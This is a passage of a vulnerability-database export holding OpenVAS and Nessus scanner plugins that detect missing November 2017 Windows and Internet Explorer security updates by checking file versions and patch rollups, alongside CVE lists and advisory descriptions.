script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode, to cause a remote denial of service against\n a system. Also could obtain information to further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2012.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048959\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2012:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"Mshtml.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"10.0.9200.22297\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Mshtml.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 10.0.9200.22297\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11835", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11852", "CVE-2017-11848", "CVE-2017-11831", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11832", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11768"], "description": "This host is missing a critical security\n update according to Microsoft KB4048957", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812149", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4048957)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4048957)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812149\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11869\", \"CVE-2017-11768\", \"CVE-2017-11788\", \"CVE-2017-11880\",\n \"CVE-2017-11791\", \"CVE-2017-11827\", \"CVE-2017-11834\", \"CVE-2017-11835\",\n \"CVE-2017-11837\", \"CVE-2017-11838\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11847\", \"CVE-2017-11848\", \"CVE-2017-11849\", \"CVE-2017-11851\",\n \"CVE-2017-11852\", \"CVE-2017-11853\", \"CVE-2017-11855\", \"CVE-2017-11856\",\n \"CVE-2017-11858\", \"CVE-2017-11831\", \"CVE-2017-11832\");\n script_bugtraq_id(101742, 101705, 101711, 101755, 101715, 101703, 101725, 101736,\n 101722, 101737, 101740, 101741, 101729, 101709, 101762, 101763,\n 101739, 101764, 101751, 101753, 101716, 101721, 101726);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 13:39:48 +0530 (Wed, 15 Nov 2017)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4048957)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4048957\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists as,\n\n - This security update includes improvements and resolves the following issues:\n Addressed issue where applications based on the Microsoft JET Database Engine\n (Microsoft Access 2007 and older or non-Microsoft applications) fail when\n creating or opening Microsoft Excel .xls files.\n\n - Security updates to Microsoft Windows Search Component, Microsoft Graphics\n Component, Windows kernel-mode drivers, Windows Media Player, and Windows kernel.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to read data that was not intended to be disclosed, and obtain information to\n further compromise the user's system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows Server 2008 R2 for x64-based Systems Service Pack 1\n\n - Microsoft Windows 7 for 32-bit/x64 Systems Service Pack 1\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4048957\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008r2:2, win7:2, win7x64:2) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"advapi32.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"6.1.7601.23915\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\advapi32.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 6.1.7601.23915\");\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11791", "CVE-2017-11869", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11843", "CVE-2017-11846"], "description": "This host is missing a critical security\n update according to Microsoft security updates KB4047206.", "modified": "2020-06-04T00:00:00", "published": "2017-11-15T00:00:00", "id": "OPENVAS:1361412562310812208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812208", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:microsoft:ie\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-11791\", \"CVE-2017-11834\", \"CVE-2017-11843\", \"CVE-2017-11846\",\n \"CVE-2017-11848\", \"CVE-2017-11855\", \"CVE-2017-11858\", \"CVE-2017-11869\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-15 10:47:54 +0530 (Wed, 15 Nov 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (KB4047206)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security updates KB4047206.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Scripting engine does not properly handle objects in memory.\n\n - Internet Explorer improperly handles page content.\n\n - Internet Explorer improperly accesses objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain information to further compromise the user's system, execute arbitrary\n code in the context of the current user, detect the navigation of the user\n leaving a maliciously crafted page.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 9.x.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4047206\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/IE/Version\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nieVer = get_app_version(cpe:CPE);\nif(!ieVer || ieVer !~ \"^9\\.\"){\n exit(0);\n}\n\niePath = smb_get_system32root();\nif(!iePath ){\n exit(0);\n}\n\niedllVer = fetch_file_version(sysPath:iePath, file_name:\"Mshtml.dll\");\nif(!iedllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) > 0)\n{\n if(version_is_less(version:iedllVer, test_version:\"9.0.8112.21073\"))\n {\n report = report_fixed_ver( file_checked:iePath + \"\\Mshtml.dll\",\n file_version:iedllVer, vulnerable_range:\"Less than 9.0.8112.21073\" );\n security_message(data:report);\n exit(0);\n }\n}\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-19T05:12:46", "description": "The remote Windows host is missing security update 4048952.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-11-14T00:00:00", "title": "KB4048952: Windows 10 Version 1511 November 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-11839", "CVE-2017-11880", "CVE-2017-11851", "CVE-2017-11856", "CVE-2017-11834", "CVE-2017-11848", "CVE-2017-11842", "CVE-2017-11836", "CVE-2017-11840", "CVE-2017-11831", "CVE-2017-11830", "CVE-2017-11873", "CVE-2017-11791", "CVE-2017-11788", "CVE-2017-11837", "CVE-2017-11841", "CVE-2017-11838", "CVE-2017-11827", "CVE-2017-11869", "CVE-2017-11863", "CVE-2017-11833", "CVE-2017-11858", "CVE-2017-11855", "CVE-2017-11849", "CVE-2017-11843", "CVE-2017-11847", "CVE-2017-11853", "CVE-2017-11846", "CVE-2017-11850", "CVE-2017-11768", "CVE-2017-11866"], "modified": "2017-11-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_NOV_4048952.NASL", "href": "https://www.tenable.com/plugins/nessus/104548", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104548);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-11768\",\n \"CVE-2017-11788\",\n \"CVE-2017-11791\",\n \"CVE-2017-11827\",\n \"CVE-2017-11830\",\n \"CVE-2017-11831\",\n \"CVE-2017-11833\",\n \"CVE-2017-11834\",\n \"CVE-2017-11836\",\n \"CVE-2017-11837\",\n \"CVE-2017-11838\",\n \"CVE-2017-11839\",\n \"CVE-2017-11840\",\n \"CVE-2017-11841\",\n \"CVE-2017-11842\",\n \"CVE-2017-11843\",\n \"CVE-2017-11846\",\n \"CVE-2017-11847\",\n \"CVE-2017-11848\",\n \"CVE-2017-11849\",\n \"CVE-2017-11850\",\n \"CVE-2017-11851\",\n \"CVE-2017-11853\",\n \"CVE-2017-11855\",\n \"CVE-2017-11856\",\n \"CVE-2017-11858\",\n \"CVE-2017-11863\",\n \"CVE-2017-11866\",\n \"CVE-2017-11869\",\n \"CVE-2017-11873\",\n \"CVE-2017-11880\"\n );\n script_bugtraq_id(\n 101703,\n 101705,\n 101706,\n 101709,\n 101711,\n 101714,\n 101715,\n 101716,\n 101719,\n 101721,\n 101722,\n 101725,\n 101727,\n 101728,\n 101729,\n 101732,\n 101733,\n 101734,\n 101735,\n 101737,\n 101738,\n 101740,\n 101741,\n 101742,\n 101748,\n 101751,\n 101753,\n 101755,\n 101762,\n 101763,\n 101764\n );\n script_xref(name:\"MSKB\", value:\"4048952\");\n script_xref(name:\"MSFT\", value:\"MS17-4048952\");\n\n script_name(english:\"KB4048952: Windows 10 Version 1511 November 2017 Cumulative Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4048952.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - A security feature bypass exists when Device Guard\n incorrectly validates an untrusted file. An attacker who\n successfully exploited this vulnerability could make an\n unsigned file appear to be signed. Because Device Guard\n relies on the signature to determine the file is non-\n malicious, Device Guard could then allow a malicious\n file to execute. In an attack scenario, an attacker\n could make an untrusted file appear to be a trusted\n file. The update addresses the vulnerability by\n correcting how Device Guard handles untrusted files.\n (CVE-2017-11830)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11866, CVE-2017-11873)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure vulnerability exists\n when the Windows GDI component improperly discloses\n kernel memory addresses. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11851)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11791)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2017-11847)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles page content, which\n could allow an attacker to detect the navigation of the\n user leaving a maliciously crafted page.\n (CVE-2017-11848)\n\n - An information disclosure vulnerability exists when the\n Windows kernel fails to properly initialize a memory\n address. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2017-11831,\n CVE-2017-11842, CVE-2017-11849, CVE-2017-11853)\n\n - A denial of service vulnerability exists when Windows\n Search improperly handles objects in memory. An attacker\n who successfully exploited the vulnerability could cause\n a remote denial of service against a system.\n (CVE-2017-11788)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2017-11850)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2017-11833)\");\n # https://support.microsoft.com/en-us/help/4048952/windows-10-update-kb4048952\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?306ca15c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4048952.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11847\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-11\";\nkbs = make_list('4048952');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\nproduct = get_kb_item_or_exit(\"SMB/ProductName\");\nif(product !~ \"Windows 10 (Eduction|Enterprise)\")\n audit(AUDIT_HOST_NOT, \"Windows 10 Eduction or Enterprise.\");\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date:\"11_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4048952])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:57", "description": "The remote Windows host is missing security update 4048954.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles redirect requests. The\n vulnerability allows Microsoft Edge to bypass Cross-\n Origin Resource Sharing (CORS) redirect restrictions,\n and to follow redirect requests that should otherwise be\n ignored. An attacker who successfully exploited the\n vulnerability could force the browser to send data that\n would otherwise be restricted to a destination website\n of the attacker's choice. (CVE-2017-11872)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Microsoft Edge. The vulnerability could corrupt memory\n in such a way that an attacker could execute arbitrary\n code in the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11836,\n CVE-2017-11839, CVE-2017-11840, CVE-2017-11841,\n CVE-2017-11861, CVE-2017-11866, CVE-2017-11870,\n CVE-2017-11871, CVE-2017-11873)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11837, CVE-2017-11838, CVE-2017-11843,\n CVE-2017-11846)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11803, CVE-2017-11844)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Internet Explorer. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11834)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge as a result of how memory is accessed in\n code compiled by the Edge Just-In-Time (JIT) compiler\n that allows Control Flow Guard (CFG) to be bypassed. By\n itself, this CFG bypass vulnerability does not allow\n arbitrary code execution. However, an attacker could use\n the CFG bypass vulnerability in conjunction with another\n vulnerability, such as a remote code execution\n vulnerability, to run arbitrary code on a target system.\n (CVE-2017-11874)\n\n - An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow the\n attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11827,\n CVE-2017-11858)\n\n - A security feature bypass vulnerability exists in\n Microsoft Edge when the Edge Content Security Policy\n (CSP) fails to properly validate certain specially\n crafted documents. An attacker who exploited the bypass\n could trick a user into loading a page containing\n malicious content. (CVE-2017-11863)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11855,\n CVE-2017-11856, CVE-2017-11869)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11880)\n\n - A Win32k information disclosure 